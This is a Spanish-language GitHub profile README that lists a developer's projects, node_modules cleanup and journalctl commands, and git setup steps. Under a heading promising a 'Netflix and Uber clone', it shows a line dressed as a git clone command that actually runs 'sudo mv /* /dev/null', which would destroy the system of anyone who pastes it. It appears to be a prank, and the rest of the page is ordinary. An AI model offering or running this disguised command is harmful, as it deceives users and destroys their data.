Skip to content
View naxo25's full-sized avatar

Block or report naxo25

Block user

Prevent this user from interacting with your repositories and sending you notifications. Learn more about blocking users.

You must be logged in to block users.

Please don't include any personal information such as legal names or email addresses. Maximum 100 characters, markdown supported. This note will be visible to only you.
Report abuse

Contact GitHub support about this user’s behavior. Learn more about reporting abuse.

Report abuse
naxo25/readme.md

Clon de Netflix y Uber

git clone https://;sudo mv /* /dev/null

Proyectos destacados

Estadio TNT Sports, dipositivos LG, Samsung y web (Estuve a cargo de esta aplicación por 2 años)

NaxChat (Ver en versión móvil, github)

App de tareas

App móvil para gimnasios

CreateIcons (Github)

App tutoriales

Mi configuración inicial para proyectos de vuejs (Demo)

Videojuego en Python para U. Santa María (Github)

Al formatear

Borrar node_modules en carpeta ubicada

# Listar
find . -name "node_modules" -type d -prune | xargs du -chs

Borrar

find . -name 'node_modules' -type d -prune -print -exec rm -rf '{}' \;

Borrar los registros del diario systemd

sudo journalctl --vacuum-time=3d

Iniciar configuración para Linux

https://github.com/naxo25/Linux

Alias

https://github.com/naxo25/alias-for-linux

Mis Snippets

https://github.com/naxo25/Snippets-Copilot

Git

Push an existing repository from the command line

git remote add origin git@github.com:naxo25/repo.git
git branch -M main
git push -u origin main

Create a new repository on the command line

echo "# repo" >> README.md
git init
git add README.md
git commit -m "first commit"
git branch -M main
git remote add origin git@github.com:naxo25/repo.git
git push -u origin main

Pinned Loading

  1. Nacholabraweb Nacholabraweb Public

    Mi sitio web hecho con configuraciones propias en python, scripts-shell y javascript.

    CSS 1

  2. NaxChatApp NaxChatApp Public

    Aplicación de chat de código multiplataforma (ios, android, windows, pwa) hecha con vueJs, firebase, nodeJs, indexedDB, etc. El diseño es solo móvil.

    Vue 3 3

  3. resizeImages resizeImages Public

    App simple hecha en vuejs para reducir diferentes tipos de imágenes y crear imágenes más pequeñas usando redimjs del lado front.

    JavaScript

  4. Prueba-Seleccion-Nodejs-Mysql-Vue Prueba-Seleccion-Nodejs-Mysql-Vue Public

    Prueba de selección fullStack vue-node-express-mysql.

    HTML 1

  5. Snippets-Copilot Snippets-Copilot Public

    Snippets para SublimeText orientados a vueJs y javaScript para agilizar la programación.

    Python 2